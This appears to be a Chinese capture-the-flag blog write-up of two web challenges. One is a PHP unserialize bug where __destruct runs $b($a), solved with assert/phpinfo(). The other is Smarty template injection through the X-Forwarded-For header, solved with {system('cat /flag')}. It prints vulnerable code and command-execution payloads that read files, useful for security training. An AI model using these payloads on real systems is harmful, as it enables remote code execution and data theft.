[NPUCTF2020]ReadlezPHP
点进源码发现/time.php?source,访问一下得到
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
看样子又是个反序列化的题目,如果不传参source就会报时,说明执行了echo $b($a);
这就是一道最简单的反序列化的题目,给data传一个序列化字符串,让ppp经过反序列化以后是一个HelloPhp对象,那么程序退出时调用_destruct(),执行我们传进去的b(b(b(a)。本来我是想传b=file_get_contents,a=/flag或者b=system,a=cat /flag的,但是没有成功。就照网上的传b=assert,a=phpinfo()好了。
[CISCN2019 华东南赛区]Web11
网页提示了smarty和XFF,那就八九不离十是模板注入了。bp抓包,添加X-Forwarded-For:${7*8}和X-Forwarded-For:a{comment}b都能执行,SSTI没跑了。
直接X-Forwarded-For:{system(“cat /flag”)} 拿到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
